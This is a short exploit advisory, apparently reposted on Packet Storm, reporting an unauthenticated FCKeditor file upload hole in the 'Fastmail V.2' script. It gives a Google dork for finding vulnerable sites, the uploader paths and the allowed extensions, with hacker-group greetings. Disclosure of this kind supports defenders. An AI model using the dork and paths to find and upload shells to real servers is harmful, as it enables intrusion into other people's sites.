Fastmail version 2 suffers from a shell upload vulnerability.
12e555a843c4b40bb82084fe3d2f9017aa81835a8b85e2abdb833544e25b2aba__________.__ __ ___ ___
\______ \ | _____ ____ | | __ / | \ ____
| | _/ | \__ \ _/ ___\| |/ / ______ / ~ \/ ___\
| | \ |__/ __ \\ \___| < /_____/ \ Y / /_/ >
|______ /____(____ /\___ >__|_ \ \___|_ /\___ /
\/ \/ \/ \/ \//_____/
.ORG
[+] Info=================================================================
[-] Title : Fastmail V.2 Script Arbitrary File Upload Vulnerability
[-] Author: Net.Edit0r
[-] Home : Black-HG.Org ~ h4ckcity.org
[-] Website : 1337day.com
[-] Vendor: http://fastemail.ir/
[-] Software Link: http://dl.webalfa.net/files/FastMail_V2-(www.webalfa.ir).zip
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 10/08/2011
[-] Google Dork : "powered by fastmail ver 2.0"
[-] Category : webapps / 0day
[-] Special Thanks : Amir-Magic ~ cyrus ~ Mikili ~ b3hz4d
[+] Exploit===============================================================
[-] uploader :)
# http://[localhost]/FCKeditor/editor/filemanager/upload/php/upload.php
# http://[localhost]/FCKeditor/editor/filemanager/upload/test.html
[-] Upload Testing !
# Allow extention : "jpg','gif','jpeg','png"
^_^ G00d LUCK ALL :=)
[+] Greets===================================================================+
+
DarkCoder, Dr.Niloo, Hurr!c4nE , hossin , _Attack_, D3adlY, 3H34N , Tre0r +
s3cure.p0rt, 1337day.com, packetstormsecurity.org, Exploit-id.com, Over-x +
h4ckcity.org, pentesters.ir, mn-team.net [PersianGulf F0r Ever] +
<3 I Love You iRAN Far==>D <3 +
+
=============================================================================+
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed